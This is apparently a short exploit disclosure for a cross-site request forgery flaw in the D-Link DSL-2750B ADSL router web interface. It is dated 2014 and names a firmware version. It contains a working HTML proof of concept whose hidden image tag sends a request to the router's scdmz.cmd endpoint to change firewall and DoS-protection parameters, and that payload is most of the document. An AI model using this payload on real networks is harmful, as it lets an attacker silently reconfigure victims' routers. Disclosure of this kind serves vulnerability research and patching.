# Exploit Title : D-Link DSL-2750B (ADSL Router) CSRF Vulnerability
# Date : 10-02-2014
# Author : killall-9@mail.com
# Vendor site : http://www.d-link.com
# Version : DSL-2750B
# Tested on : Firmware Version: EU_2.02; Hardware Version: B1
 
The D-Link DSL-2750B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router parameters.
 
POC=>
 
<html lang="en">
<head>
<title>Pinata-CSRF-poc for D-Link</title>
</head>
<body>
<img src="http://192.168.1.1/scdmz.cmd?&fwFlag=50853375&dosenbl=1" />
</body>
</html>
 
cincin°°°